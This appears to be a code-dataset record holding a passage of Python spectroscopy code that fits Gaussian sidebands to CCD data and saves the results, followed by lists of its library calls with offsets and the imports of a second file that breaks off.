peakIdx-window, peakIdx+window))
# print "I couldn't fit", elem
# print "It's sideband", num
# print "In file", self.fname
# print "because", e
# print "wanted to fit xindx", peakIdx, "+-", window
self.sb_list[elem] = None
# This will ensure the rest of the loop is not run without
# an actual fit.
continue
# The amplitude could be negative if the linewidth is negative
coeff[1] = abs(coeff[1])
# The linewidth shouldn't be negative
coeff[2] = abs(coeff[2])
if verbose:
print("\tFit successful: ", end=' ')
print("p = " + np.array_str(coeff, precision=4))
# print "coeffs:", coeff
# print "sigma for {}: {}".format(self.sb_list[elem], coeff[2])
if 10e-4 > coeff[2] > 10e-6:
try:
sb_fits.append(np.hstack((
self.sb_list[elem], coeff,
np.sqrt(np.diag(var_list)))))
except RuntimeWarning:
sb_fits.append(np.hstack((
self.sb_list[elem], coeff,
np.sqrt(np.abs(np.diag(var_list))))))
# the var_list wasn't approximating the error well enough, even
# when using sigma and absoluteSigma self.sb_guess[elem, 2] is
# the relative error as calculated by the guess_sidebands
# method coeff[1] is the area from the fit. Therefore, the
# product should be the absolute error of the integrated area
# of the sideband. The other errors are still underestimated.
#
# 1/12/18 note: So it looks like what hunter did is calculate
# an error estimate for the strength/area by the quadrature sum
# of errors of the points in the peak
# (from like 813 in guess_sidebands:
# error_est = np.sqrt(sum([i ** 2 for i in error[
# found_index - 1:found_index + 2]])) / (
# Where the error is what comes from the CCD by averaging 4
# spectra. As far as I can tell, it doesn't currently pull in
# the dark counts or anything like that, except maybe
# indirectly since it'll cause the variations in the peaks
sb_fits[-1][6] = self.sb_guess[elem, 2] * coeff[1]
if verbose:
print(
"\tRel.Err: {:.4e} | Abs.Err: {:.4e}".format(
self.sb_guess[elem, 2],
coeff[1] * self.sb_guess[elem, 2]))
print()
# print "The rel. error guess is",
# self.sb_guess[elem, 2]
# print "The abs. error guess is",
# coeff[1] * self.sb_guess[elem, 2]
# The error from self.sb_guess[elem, 2] is a relative error
if plot and verbose:
plt.figure('CCD data')
linewidth = 5
x_vals = np.linspace(
data_temp[0, 0], data_temp[-1, 0], num=500)
if elem != 0:
try:
plt.plot(x_vals, gauss(x_vals, *coeff),
plt.gca().get_lines()[-1].get_color() + '--',
# I don't really know. Mostly
# just looked around at what functions
# matplotlib has...
linewidth=linewidth)
# to prevent weird mac issues with the matplotlib things?
except Exception:
plt.plot(
x_vals, gauss(x_vals, *coeff), '--',
linewidth=linewidth)
else:
plt.plot(
x_vals, gauss(x_vals, *coeff), '--',
linewidth=linewidth)
sb_fits_temp = np.asarray(sb_fits)
reorder = [0, 1, 5, 2, 6, 3, 7, 4, 8]
# Reorder the list to put the error of the i-th parameter as the i+1th.
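        # i.e. columns go from [order, c0, c1, c2, c3, e0, e1, e2, e3] to
        # [order, c0, e0, c1, e1, c2, e2, c3, e3].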
try:
sb_fits = sb_fits_temp[:, reorder]
# if verbose: print "The abs. error guess is", sb_fits[:, 0:5]
except Exception:
raise RuntimeError("No sidebands to fit?")
# Going to label the appropriate row with the sideband
self.sb_list = sorted(list([x for x in self.sb_list if x is not None]))
sb_names = np.vstack(self.sb_list)
# Sort by SB order
sorter = np.argsort(sb_fits[:, 0])
self.sb_results = np.array(sb_fits[sorter, :7])
if verbose:
print("\tsb_results:")
print(
"\t\t" + ("{:^5s}" + ("{:^12s}")*(self.sb_results.shape[1]-1)).
format("SB", "Cen.En.", "", "Area", "", "Width", ""))
for line in self.sb_results:
print(
'\t\t[' + ("{:^5.0f}" + "{:<12.4g}"*(line.size-1)).format(
*line) + ']')
print('-'*19)
self.full_dict = {}
for sb in self.sb_results:
self.full_dict[sb[0]] = np.asarray(sb[1:])
def infer_frequencies(
self, nir_units="wavenumber", thz_units="GHz", bad_points=-2):
"""
This guy tries to fit the results from fit_sidebands to a line to get
the relevant frequencies
:param nir_units: What units do you want this to output?
:type nir_units: 'nm', 'wavenumber', 'eV', 'THz'
:param thz_units: What units do you want this to output for the THz?
:type thz_units: 'GHz', 'wavenumber', 'meV'
:param bad_points: How many more-positive order sidebands shall this
ignore?
:type bad_points: int
:return: freqNIR, freqTHz, the frequencies in the appropriate units
"""
# force same units for in dict
freqNIR, freqTHz = calc_laser_frequencies(
self, "wavenumber", "wavenumber", bad_points)
self.parameters["calculated NIR freq (cm-1)"] = "{}".format(
freqNIR, nir_units)
self.parameters["calculated THz freq (cm-1)"] = "{}".format(
freqTHz, freqTHz)
freqNIR, freqTHz = calc_laser_frequencies(
self, nir_units, thz_units, bad_points)
return freqNIR, freqTHz
def save_processing(
self, file_name, folder_str, marker='', index='', verbose=''):
"""
This will save all of the self.proc_data and the results from the
fitting of this individual file.
Format:
spectra_fname = file_name + '_' + marker + '_' + str(index) + '.txt'
fit_fname = file_name + '_' + marker + '_' + str(index) + '_fits.txt'
Inputs:
file_name = the beginning of the file name to be saved
folder_str = the location of the folder where the file will be saved,
will create the folder, if necessary.
marker = I...I don't know what this was originally for
index = used to keep these files from overwriting themselves when in a
list
Outputs:
Two files:
self.proc_data = the continuous spectrum
self.sb_results = the individual sideband details
:param file_name: The base name for the saved file
:type file_name: str
        :param folder_str: The full name of the folder the file is saved in.
            The folder will be created if necessary
:type folder_str: str
:param marker: Marker for the file, appended to file_name, often the
self.parameters['series']
:type marker: str
:param index: used to keep these files from overwriting themselves when
marker is the same
:type index: str or int
:return: None
"""
try:
os.mkdir(folder_str)
except OSError as e:
if e.errno == errno.EEXIST:
pass
else:
raise
temp = np.array(self.sb_results)
# But [:, 3] is already area?
ampli = np.array([temp[:, 3] / temp[:, 5]])
# (The old name was area)
# I think it must be amplitude
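        # For a Gaussian, peak height = area / (sigma * sqrt(2 * pi)), so
        # area / linewidth is proportional to the peak amplitude, which is
        # presumably why this extra column is worth saving alongside the
        # raw area.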
temp[:, 5:7] = temp[:, 5:7] * 1000 # For meV linewidths
if verbose:
print("sb_results", self.sb_results.shape)
print("ampli", ampli.shape)
save_results = np.hstack((temp, ampli.T))
spectra_fname = file_name + '_' + marker + '_' + str(index) + '.txt'
fit_fname = file_name + '_' + marker + '_' + str(index) + '_fits.txt'
self.save_name = spectra_fname
self.parameters['addenda'] = self.addenda
self.parameters['subtrahenda'] = self.subtrahenda
try:
parameter_str = json.dumps(
self.parameters, sort_keys=True, indent=4,
separators=(',', ': '))
except Exception:
print("Source: EMCCD_image.save_images\nJSON FAILED")
print("Here is the dictionary that broke JSON:\n", self.parameters)
return
parameter_str = parameter_str.replace('\n', '\n#')
# Make the number of lines constant so importing is easier
num_lines = parameter_str.count('#')
# for num in range(99 - num_lines): parameter_str += '\n#'
parameter_str += '\n#' * (99 - num_lines)
origin_import_spec = (
'\nNIR frequency,Signal,Standard error\neV,arb. u.,arb. u.')
spec_header = '#' + parameter_str + origin_import_spec
origin_import_fits = (
# TODO: ensure splitting lines with a + for concatenation works
'\nSideband,Center energy,error,Sideband strength,error,'
+ 'Linewidth,error,Amplitude')
origin_import_fits += '\norder,eV,,arb. u.,,meV,,arb. u.'
origin_import_fits += "\n{},,,{},,,".format(marker, marker)
fits_header = '#' + parameter_str + origin_import_fits
# print "DEBUG: in saving", folder_str, ",", spectra_fname
np.savetxt(
os.path.join(folder_str, spectra_fname), self.proc_data,
delimiter=',', header=spec_header, comments='', fmt='%0.6e')
np.savetxt(
os.path.join(folder_str, fit_fname), save_results,
delimiter=',', header=fits_header, comments='', fmt='%0.6e')
if verbose:
print("Save image.\nDirectory: {}".format(os.path.join(
folder_str, spectra_fname)))
|
[
"os.mkdir",
"numpy.sum",
"numpy.argmax",
"numpy.array_str",
"json.dumps",
"numpy.argsort",
"numpy.isclose",
"numpy.mean",
"matplotlib.pyplot.figure",
"numpy.arange",
"matplotlib.pyplot.gca",
"numpy.diag",
"os.path.join",
"numpy.set_printoptions",
"numpy.std",
"numpy.append",
"numpy.linspace",
"copy.deepcopy",
"numpy.ones_like",
"os.path.basename",
"numpy.asarray",
"numpy.flipud",
"Stele.processing.processing_hsg.helper_functions.gauss",
"numpy.hstack",
"matplotlib.pyplot.text",
"scipy.optimize.curve_fit",
"numpy.vstack",
"matplotlib.pyplot.plot",
"numpy.zeros",
"numpy.where",
"numpy.array",
"numpy.sqrt"
] |
[((277, 311), 'numpy.set_printoptions', 'np.set_printoptions', ([], {'linewidth': '(500)'}), '(linewidth=500)\n', (296, 311), True, 'import numpy as np\n'), ((3686, 3709), 'numpy.array', 'np.array', (['self.ccd_data'], {}), '(self.ccd_data)\n', (3694, 3709), True, 'import numpy as np\n'), ((4968, 4980), 'numpy.array', 'np.array', (['[]'], {}), '([])\n', (4976, 4980), True, 'import numpy as np\n'), ((5005, 5017), 'numpy.array', 'np.array', (['[]'], {}), '([])\n', (5013, 5017), True, 'import numpy as np\n'), ((5070, 5082), 'numpy.array', 'np.array', (['[]'], {}), '([])\n', (5078, 5082), True, 'import numpy as np\n'), ((6064, 6083), 'copy.deepcopy', 'copy.deepcopy', (['self'], {}), '(self)\n', (6077, 6083), False, 'import copy\n'), ((7849, 7868), 'copy.deepcopy', 'copy.deepcopy', (['self'], {}), '(self)\n', (7862, 7868), False, 'import copy\n'), ((12199, 12229), 'numpy.array', 'np.array', (['self.proc_data[:, 0]'], {}), '(self.proc_data[:, 0])\n', (12207, 12229), True, 'import numpy as np\n'), ((12247, 12277), 'numpy.array', 'np.array', (['self.proc_data[:, 1]'], {}), '(self.proc_data[:, 1])\n', (12255, 12277), True, 'import numpy as np\n'), ((12965, 12982), 'numpy.argmax', 'np.argmax', (['y_axis'], {}), '(y_axis)\n', (12974, 12982), True, 'import numpy as np\n'), ((13554, 13572), 'numpy.argmax', 'np.argmax', (['check_y'], {}), '(check_y)\n', (13563, 13572), True, 'import numpy as np\n'), ((13598, 13654), 'numpy.sum', 'np.sum', (['check_y[check_max_index - 2:check_max_index + 3]'], {}), '(check_y[check_max_index - 2:check_max_index + 3])\n', (13604, 13654), True, 'import numpy as np\n'), ((13689, 13742), 'numpy.mean', 'np.mean', (['check_y[[0, 1, 2, 3, 4, -1, -2, -3, -4, -5]]'], {}), '(check_y[[0, 1, 2, 3, 4, -1, -2, -3, -4, -5]])\n', (13696, 13742), True, 'import numpy as np\n'), ((13765, 13817), 'numpy.std', 'np.std', (['check_y[[0, 1, 2, 3, 4, -1, -2, -3, -4, -5]]'], {}), '(check_y[[0, 1, 2, 3, 4, -1, -2, -3, -4, -5]])\n', (13771, 13817), True, 'import numpy as np\n'), ((28961, 28991), 'numpy.array', 'np.array', (['self.proc_data[:, 0]'], {}), '(self.proc_data[:, 0])\n', (28969, 28991), True, 'import numpy as np\n'), ((29009, 29039), 'numpy.array', 'np.array', (['self.proc_data[:, 1]'], {}), '(self.proc_data[:, 1])\n', (29017, 29039), True, 'import numpy as np\n'), ((29056, 29086), 'numpy.array', 'np.array', (['self.proc_data[:, 2]'], {}), '(self.proc_data[:, 2])\n', (29064, 29086), True, 'import numpy as np\n'), ((29539, 29556), 'numpy.argmax', 'np.argmax', (['y_axis'], {}), '(y_axis)\n', (29548, 29556), True, 'import numpy as np\n'), ((30128, 30146), 'numpy.argmax', 'np.argmax', (['check_y'], {}), '(check_y)\n', (30137, 30146), True, 'import numpy as np\n'), ((30172, 30228), 'numpy.sum', 'np.sum', (['check_y[check_max_index - 2:check_max_index + 3]'], {}), '(check_y[check_max_index - 2:check_max_index + 3])\n', (30178, 30228), True, 'import numpy as np\n'), ((30263, 30316), 'numpy.mean', 'np.mean', (['check_y[[0, 1, 2, 3, 4, -1, -2, -3, -4, -5]]'], {}), '(check_y[[0, 1, 2, 3, 4, -1, -2, -3, -4, -5]])\n', (30270, 30316), True, 'import numpy as np\n'), ((30339, 30391), 'numpy.std', 'np.std', (['check_y[[0, 1, 2, 3, 4, -1, -2, -3, -4, -5]]'], {}), '(check_y[[0, 1, 2, 3, 4, -1, -2, -3, -4, -5]])\n', (30345, 30391), True, 'import numpy as np\n'), ((53038, 53057), 'numpy.asarray', 'np.asarray', (['sb_fits'], {}), '(sb_fits)\n', (53048, 53057), True, 'import numpy as np\n'), ((53563, 53586), 'numpy.vstack', 'np.vstack', (['self.sb_list'], {}), '(self.sb_list)\n', (53572, 53586), True, 'import numpy as np\n'), ((53632, 53657), 'numpy.argsort', 'np.argsort', (['sb_fits[:, 0]'], {}), '(sb_fits[:, 0])\n', (53642, 53657), True, 'import numpy as np\n'), ((53684, 53713), 'numpy.array', 'np.array', (['sb_fits[sorter, :7]'], {}), '(sb_fits[sorter, :7])\n', (53692, 53713), True, 'import numpy as np\n'), ((57102, 57127), 'numpy.array', 'np.array', (['self.sb_results'], {}), '(self.sb_results)\n', (57110, 57127), True, 'import numpy as np\n'), ((57183, 57218), 'numpy.array', 'np.array', (['[temp[:, 3] / temp[:, 5]]'], {}), '([temp[:, 3] / temp[:, 5]])\n', (57191, 57218), True, 'import numpy as np\n'), ((57495, 57521), 'numpy.hstack', 'np.hstack', (['(temp, ampli.T)'], {}), '((temp, ampli.T))\n', (57504, 57521), True, 'import numpy as np\n'), ((6367, 6445), 'numpy.isclose', 'np.isclose', (["ret.parameters['center_lambda']", "other.parameters['center_lambda']"], {}), "(ret.parameters['center_lambda'], other.parameters['center_lambda'])\n", (6377, 6445), True, 'import numpy as np\n'), ((8202, 8256), 'numpy.isclose', 'np.isclose', (['ret.proc_data[0, 0]', 'other.proc_data[0, 0]'], {}), '(ret.proc_data[0, 0], other.proc_data[0, 0])\n', (8212, 8256), True, 'import numpy as np\n'), ((9193, 9221), 'os.path.basename', 'os.path.basename', (['self.fname'], {}), '(self.fname)\n', (9209, 9221), False, 'import os\n'), ((12311, 12341), 'numpy.array', 'np.array', (['self.proc_data[:, 2]'], {}), '(self.proc_data[:, 2])\n', (12319, 12341), True, 'import numpy as np\n'), ((16672, 16690), 'numpy.argmax', 'np.argmax', (['check_y'], {}), '(check_y)\n', (16681, 16690), True, 'import numpy as np\n'), ((16929, 16985), 'numpy.sum', 'np.sum', (['check_y[check_max_index - 1:check_max_index + 2]'], {}), '(check_y[check_max_index - 1:check_max_index + 2])\n', (16935, 16985), True, 'import numpy as np\n'), ((17690, 17761), 'numpy.append', 'np.append', (['check_y[:check_max_index - 1]', 'check_y[check_max_index + 2:]'], {}), '(check_y[:check_max_index - 1], check_y[check_max_index + 2:])\n', (17699, 17761), True, 'import numpy as np\n'), ((22107, 22125), 'numpy.argmax', 'np.argmax', (['check_y'], {}), '(check_y)\n', (22116, 22125), True, 'import numpy as np\n'), ((22310, 22384), 'numpy.sum', 'np.sum', (['check_y[check_max_index - octant - 1:check_max_index + octant + 1]'], {}), '(check_y[check_max_index - octant - 1:check_max_index + octant + 1])\n', (22316, 22384), True, 'import numpy as np\n'), ((33253, 33271), 'numpy.argmax', 'np.argmax', (['check_y'], {}), '(check_y)\n', (33262, 33271), True, 'import numpy as np\n'), ((33510, 33566), 'numpy.sum', 'np.sum', (['check_y[check_max_index - 1:check_max_index + 2]'], {}), '(check_y[check_max_index - 1:check_max_index + 2])\n', (33516, 33566), True, 'import numpy as np\n'), ((34271, 34342), 'numpy.append', 'np.append', (['check_y[:check_max_index - 1]', 'check_y[check_max_index + 2:]'], {}), '(check_y[:check_max_index - 1], check_y[check_max_index + 2:])\n', (34280, 34342), True, 'import numpy as np\n'), ((38626, 38644), 'numpy.argmax', 'np.argmax', (['check_y'], {}), '(check_y)\n', (38635, 38644), True, 'import numpy as np\n'), ((38896, 38970), 'numpy.sum', 'np.sum', (['check_y[check_max_index - octant - 1:check_max_index + octant + 1]'], {}), '(check_y[check_max_index - octant - 1:check_max_index + octant + 1])\n', (38902, 38970), True, 'import numpy as np\n'), ((46294, 46388), 'numpy.array', 'np.array', (['[self.sb_guess[elem, 0], self.sb_guess[elem, 1] * width_guess, width_guess, 0.1\n ]'], {}), '(self.sb_guess[elem, 0], self.sb_guess[elem, 1] * width_guess,\n width_guess, 0.1])\n', (46302, 46388), True, 'import numpy as np\n'), ((54245, 54263), 'numpy.asarray', 'np.asarray', (['sb[1:]'], {}), '(sb[1:])\n', (54255, 54263), True, 'import numpy as np\n'), ((56936, 56956), 'os.mkdir', 'os.mkdir', (['folder_str'], {}), '(folder_str)\n', (56944, 56956), False, 'import os\n'), ((57867, 57944), 'json.dumps', 'json.dumps', (['self.parameters'], {'sort_keys': '(True)', 'indent': '(4)', 'separators': "(',', ': ')"}), "(self.parameters, sort_keys=True, indent=4, separators=(',', ': '))\n", (57877, 57944), False, 'import json\n'), ((59144, 59183), 'os.path.join', 'os.path.join', (['folder_str', 'spectra_fname'], {}), '(folder_str, spectra_fname)\n', (59156, 59183), False, 'import os\n'), ((59306, 59341), 'os.path.join', 'os.path.join', (['folder_str', 'fit_fname'], {}), '(folder_str, fit_fname)\n', (59318, 59341), False, 'import os\n'), ((3071, 3090), 'numpy.array', 'np.array', (['hsg_thing'], {}), '(hsg_thing)\n', (3079, 3090), True, 'import numpy as np\n'), ((3432, 3456), 'numpy.flipud', 'np.flipud', (['self.ccd_data'], {}), '(self.ccd_data)\n', (3441, 3456), True, 'import numpy as np\n'), ((6617, 6680), 'numpy.sqrt', 'np.sqrt', (['(self.proc_data[:, 1] ** 2 + other.proc_data[:, 1] ** 2)'], {}), '(self.proc_data[:, 1] ** 2 + other.proc_data[:, 1] ** 2)\n', (6624, 6680), True, 'import numpy as np\n'), ((8402, 8465), 'numpy.sqrt', 'np.sqrt', (['(self.proc_data[:, 1] ** 2 + other.proc_data[:, 1] ** 2)'], {}), '(self.proc_data[:, 1] ** 2 + other.proc_data[:, 1] ** 2)\n', (8409, 8465), True, 'import numpy as np\n'), ((12054, 12082), 'os.path.basename', 'os.path.basename', (['self.fname'], {}), '(self.fname)\n', (12070, 12082), False, 'import os\n'), ((12492, 12512), 'numpy.ones_like', 'np.ones_like', (['x_axis'], {}), '(x_axis)\n', (12504, 12512), True, 'import numpy as np\n'), ((16345, 16406), 'numpy.where', 'np.where', (['((x_axis > lo_freq_bound) & (x_axis < hi_freq_bound))'], {}), '((x_axis > lo_freq_bound) & (x_axis < hi_freq_bound))\n', (16353, 16406), True, 'import numpy as np\n'), ((17053, 17075), 'matplotlib.pyplot.figure', 'plt.figure', (['"""CCD data"""'], {}), "('CCD data')\n", (17063, 17075), True, 'import matplotlib.pyplot as plt\n'), ((17092, 17157), 'matplotlib.pyplot.plot', 'plt.plot', (['([lo_freq_bound] * 2)', '[0, check_y[check_max_index]]', '"""b"""'], {}), "([lo_freq_bound] * 2, [0, check_y[check_max_index]], 'b')\n", (17100, 17157), True, 'import matplotlib.pyplot as plt\n'), ((17195, 17260), 'matplotlib.pyplot.plot', 'plt.plot', (['([hi_freq_bound] * 2)', '[0, check_y[check_max_index]]', '"""b"""'], {}), "([hi_freq_bound] * 2, [0, check_y[check_max_index]], 'b')\n", (17203, 17260), True, 'import matplotlib.pyplot as plt\n'), ((17463, 17541), 'matplotlib.pyplot.text', 'plt.text', (['((lo_freq_bound + hi_freq_bound) / 2)', 'check_y[check_max_index]', 'order'], {}), '((lo_freq_bound + hi_freq_bound) / 2, check_y[check_max_index], order)\n', (17471, 17541), True, 'import matplotlib.pyplot as plt\n'), ((22477, 22499), 'matplotlib.pyplot.figure', 'plt.figure', (['"""CCD data"""'], {}), "('CCD data')\n", (22487, 22499), True, 'import matplotlib.pyplot as plt\n'), ((22516, 22581), 'matplotlib.pyplot.plot', 'plt.plot', (['([lo_freq_bound] * 2)', '[0, check_y[check_max_index]]', '"""b"""'], {}), "([lo_freq_bound] * 2, [0, check_y[check_max_index]], 'b')\n", (22524, 22581), True, 'import matplotlib.pyplot as plt\n'), ((22619, 22684), 'matplotlib.pyplot.plot', 'plt.plot', (['([hi_freq_bound] * 2)', '[0, check_y[check_max_index]]', '"""b"""'], {}), "([hi_freq_bound] * 2, [0, check_y[check_max_index]], 'b')\n", (22627, 22684), True, 'import matplotlib.pyplot as plt\n'), ((22722, 22816), 'matplotlib.pyplot.plot', 'plt.plot', (['[lo_freq_bound, hi_freq_bound]', '([check_y[check_max_index]] * 2)', '"""b"""'], {'label': 'order'}), "([lo_freq_bound, hi_freq_bound], [check_y[check_max_index]] * 2,\n 'b', label=order)\n", (22730, 22816), True, 'import matplotlib.pyplot as plt\n'), ((22870, 22948), 'matplotlib.pyplot.text', 'plt.text', (['((lo_freq_bound + hi_freq_bound) / 2)', 'check_y[check_max_index]', 'order'], {}), '((lo_freq_bound + hi_freq_bound) / 2, check_y[check_max_index], order)\n', (22878, 22948), True, 'import matplotlib.pyplot as plt\n'), ((28816, 28844), 'os.path.basename', 'os.path.basename', (['self.fname'], {}), '(self.fname)\n', (28832, 28844), False, 'import os\n'), ((32926, 32987), 'numpy.where', 'np.where', (['((x_axis > lo_freq_bound) & (x_axis < hi_freq_bound))'], {}), '((x_axis > lo_freq_bound) & (x_axis < hi_freq_bound))\n', (32934, 32987), True, 'import numpy as np\n'), ((33634, 33656), 'matplotlib.pyplot.figure', 'plt.figure', (['"""CCD data"""'], {}), "('CCD data')\n", (33644, 33656), True, 'import matplotlib.pyplot as plt\n'), ((33673, 33738), 'matplotlib.pyplot.plot', 'plt.plot', (['([lo_freq_bound] * 2)', '[0, check_y[check_max_index]]', '"""b"""'], {}), "([lo_freq_bound] * 2, [0, check_y[check_max_index]], 'b')\n", (33681, 33738), True, 'import matplotlib.pyplot as plt\n'), ((33776, 33841), 'matplotlib.pyplot.plot', 'plt.plot', (['([hi_freq_bound] * 2)', '[0, check_y[check_max_index]]', '"""b"""'], {}), "([hi_freq_bound] * 2, [0, check_y[check_max_index]], 'b')\n", (33784, 33841), True, 'import matplotlib.pyplot as plt\n'), ((34044, 34122), 'matplotlib.pyplot.text', 'plt.text', (['((lo_freq_bound + hi_freq_bound) / 2)', 'check_y[check_max_index]', 'order'], {}), '((lo_freq_bound + hi_freq_bound) / 2, check_y[check_max_index], order)\n', (34052, 34122), True, 'import matplotlib.pyplot as plt\n'), ((39063, 39085), 'matplotlib.pyplot.figure', 'plt.figure', (['"""CCD data"""'], {}), "('CCD data')\n", (39073, 39085), True, 'import matplotlib.pyplot as plt\n'), ((39102, 39167), 'matplotlib.pyplot.plot', 'plt.plot', (['([lo_freq_bound] * 2)', '[0, check_y[check_max_index]]', '"""b"""'], {}), "([lo_freq_bound] * 2, [0, check_y[check_max_index]], 'b')\n", (39110, 39167), True, 'import matplotlib.pyplot as plt\n'), ((39205, 39270), 'matplotlib.pyplot.plot', 'plt.plot', (['([hi_freq_bound] * 2)', '[0, check_y[check_max_index]]', '"""b"""'], {}), "([hi_freq_bound] * 2, [0, check_y[check_max_index]], 'b')\n", (39213, 39270), True, 'import matplotlib.pyplot as plt\n'), ((39308, 39402), 'matplotlib.pyplot.plot', 'plt.plot', (['[lo_freq_bound, hi_freq_bound]', '([check_y[check_max_index]] * 2)', '"""b"""'], {'label': 'order'}), "([lo_freq_bound, hi_freq_bound], [check_y[check_max_index]] * 2,\n 'b', label=order)\n", (39316, 39402), True, 'import matplotlib.pyplot as plt\n'), ((39456, 39534), 'matplotlib.pyplot.text', 'plt.text', (['((lo_freq_bound + hi_freq_bound) / 2)', 'check_y[check_max_index]', 'order'], {}), '((lo_freq_bound + hi_freq_bound) / 2, check_y[check_max_index], order)\n', (39464, 39534), True, 'import matplotlib.pyplot as plt\n'), ((45142, 45170), 'os.path.basename', 'os.path.basename', (['self.fname'], {}), '(self.fname)\n', (45158, 45170), False, 'import os\n'), ((47106, 47128), 'matplotlib.pyplot.figure', 'plt.figure', (['"""CCD data"""'], {}), "('CCD data')\n", (47116, 47128), True, 'import matplotlib.pyplot as plt\n'), ((47184, 47239), 'numpy.linspace', 'np.linspace', (['data_temp[0, 0]', 'data_temp[-1, 0]'], {'num': '(500)'}), '(data_temp[0, 0], data_temp[-1, 0], num=500)\n', (47195, 47239), True, 'import numpy as np\n'), ((48449, 48519), 'scipy.optimize.curve_fit', 'curve_fit', (['gauss', 'data_temp[:, 0]', 'data_temp[:, 1]'], {'p0': 'p0', 'maxfev': '(2000)'}), '(gauss, data_temp[:, 0], data_temp[:, 1], p0=p0, maxfev=2000)\n', (48458, 48519), False, 'from scipy.optimize import curve_fit\n'), ((51997, 52019), 'matplotlib.pyplot.figure', 'plt.figure', (['"""CCD data"""'], {}), "('CCD data')\n", (52007, 52019), True, 'import matplotlib.pyplot as plt\n'), ((52075, 52130), 'numpy.linspace', 'np.linspace', (['data_temp[0, 0]', 'data_temp[-1, 0]'], {'num': '(500)'}), '(data_temp[0, 0], data_temp[-1, 0], num=500)\n', (52086, 52130), True, 'import numpy as np\n'), ((13258, 13283), 'numpy.zeros', 'np.zeros', (['(15 - global_max)'], {}), '(15 - global_max)\n', (13266, 13283), True, 'import numpy as np\n'), ((26735, 26760), 'numpy.asarray', 'np.asarray', (['sb_freq_guess'], {}), '(sb_freq_guess)\n', (26745, 26760), True, 'import numpy as np\n'), ((26796, 26820), 'numpy.asarray', 'np.asarray', (['sb_amp_guess'], {}), '(sb_amp_guess)\n', (26806, 26820), True, 'import numpy as np\n'), ((26856, 26880), 'numpy.asarray', 'np.asarray', (['sb_error_est'], {}), '(sb_error_est)\n', (26866, 26880), True, 'import numpy as np\n'), ((29832, 29857), 'numpy.zeros', 'np.zeros', (['(15 - global_max)'], {}), '(15 - global_max)\n', (29840, 29857), True, 'import numpy as np\n'), ((43164, 43189), 'numpy.asarray', 'np.asarray', (['sb_freq_guess'], {}), '(sb_freq_guess)\n', (43174, 43189), True, 'import numpy as np\n'), ((43191, 43215), 'numpy.asarray', 'np.asarray', (['sb_amp_guess'], {}), '(sb_amp_guess)\n', (43201, 43215), True, 'import numpy as np\n'), ((43233, 43257), 'numpy.asarray', 'np.asarray', (['sb_error_est'], {}), '(sb_error_est)\n', (43243, 43257), True, 'import numpy as np\n'), ((59504, 59543), 'os.path.join', 'os.path.join', (['folder_str', 'spectra_fname'], {}), '(folder_str, spectra_fname)\n', (59516, 59543), False, 'import os\n'), ((3311, 3344), 'numpy.ones_like', 'np.ones_like', (['self.ccd_data[:, 1]'], {}), '(self.ccd_data[:, 1])\n', (3323, 3344), True, 'import numpy as np\n'), ((13421, 13448), 'numpy.zeros', 'np.zeros', (['(global_max - 1585)'], {}), '(global_max - 1585)\n', (13429, 13448), True, 'import numpy as np\n'), ((29995, 30022), 'numpy.zeros', 'np.zeros', (['(global_max - 1585)'], {}), '(global_max - 1585)\n', (30003, 30022), True, 'import numpy as np\n'), ((46933, 46962), 'numpy.array_str', 'np.array_str', (['p0'], {'precision': '(4)'}), '(p0, precision=4)\n', (46945, 46962), True, 'import numpy as np\n'), ((48044, 48062), 'Stele.processing.processing_hsg.helper_functions.gauss', 'gauss', (['x_vals', '*p0'], {}), '(x_vals, *p0)\n', (48049, 48062), False, 'from Stele.processing.processing_hsg.helper_functions import gauss\n'), ((49573, 49605), 'numpy.array_str', 'np.array_str', (['coeff'], {'precision': '(4)'}), '(coeff, precision=4)\n', (49585, 49605), True, 'import numpy as np\n'), ((52941, 52962), 'Stele.processing.processing_hsg.helper_functions.gauss', 'gauss', (['x_vals', '*coeff'], {}), '(x_vals, *coeff)\n', (52946, 52962), False, 'from Stele.processing.processing_hsg.helper_functions import gauss\n'), ((23246, 23264), 'numpy.arange', 'np.arange', (['no_peak'], {}), '(no_peak)\n', (23255, 23264), True, 'import numpy as np\n'), ((23266, 23288), 'numpy.arange', 'np.arange', (['(-no_peak)', '(0)'], {}), '(-no_peak, 0)\n', (23275, 23288), True, 'import numpy as np\n'), ((23376, 23394), 'numpy.arange', 'np.arange', (['no_peak'], {}), '(no_peak)\n', (23385, 23394), True, 'import numpy as np\n'), ((23396, 23418), 'numpy.arange', 'np.arange', (['(-no_peak)', '(0)'], {}), '(-no_peak, 0)\n', (23405, 23418), True, 'import numpy as np\n'), ((39832, 39850), 'numpy.arange', 'np.arange', (['no_peak'], {}), '(no_peak)\n', (39841, 39850), True, 'import numpy as np\n'), ((39852, 39874), 'numpy.arange', 'np.arange', (['(-no_peak)', '(0)'], {}), '(-no_peak, 0)\n', (39861, 39874), True, 'import numpy as np\n'), ((39962, 39980), 'numpy.arange', 'np.arange', (['no_peak'], {}), '(no_peak)\n', (39971, 39980), True, 'import numpy as np\n'), ((39982, 40004), 'numpy.arange', 'np.arange', (['(-no_peak)', '(0)'], {}), '(-no_peak, 0)\n', (39991, 40004), True, 'import numpy as np\n'), ((47357, 47375), 'Stele.processing.processing_hsg.helper_functions.gauss', 'gauss', (['x_vals', '*p0'], {}), '(x_vals, *p0)\n', (47362, 47375), False, 'from Stele.processing.processing_hsg.helper_functions import gauss\n'), ((52248, 52269), 'Stele.processing.processing_hsg.helper_functions.gauss', 'gauss', (['x_vals', '*coeff'], {}), '(x_vals, *coeff)\n', (52253, 52269), False, 'from Stele.processing.processing_hsg.helper_functions import gauss\n'), ((47884, 47902), 'Stele.processing.processing_hsg.helper_functions.gauss', 'gauss', (['x_vals', '*p0'], {}), '(x_vals, *p0)\n', (47889, 47902), False, 'from Stele.processing.processing_hsg.helper_functions import gauss\n'), ((52778, 52799), 'Stele.processing.processing_hsg.helper_functions.gauss', 'gauss', (['x_vals', '*coeff'], {}), '(x_vals, *coeff)\n', (52783, 52799), False, 'from Stele.processing.processing_hsg.helper_functions import gauss\n'), ((49920, 49937), 'numpy.diag', 'np.diag', (['var_list'], {}), '(var_list)\n', (49927, 49937), True, 'import numpy as np\n'), ((50118, 50135), 'numpy.diag', 'np.diag', (['var_list'], {}), '(var_list)\n', (50125, 50135), True, 'import numpy as np\n'), ((47473, 47482), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\n', (47480, 47482), True, 'import matplotlib.pyplot as plt\n'), ((52304, 52313), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\n', (52311, 52313), True, 'import matplotlib.pyplot as plt\n')]
|
import requests
import os
import cv2
import shutil
def main():
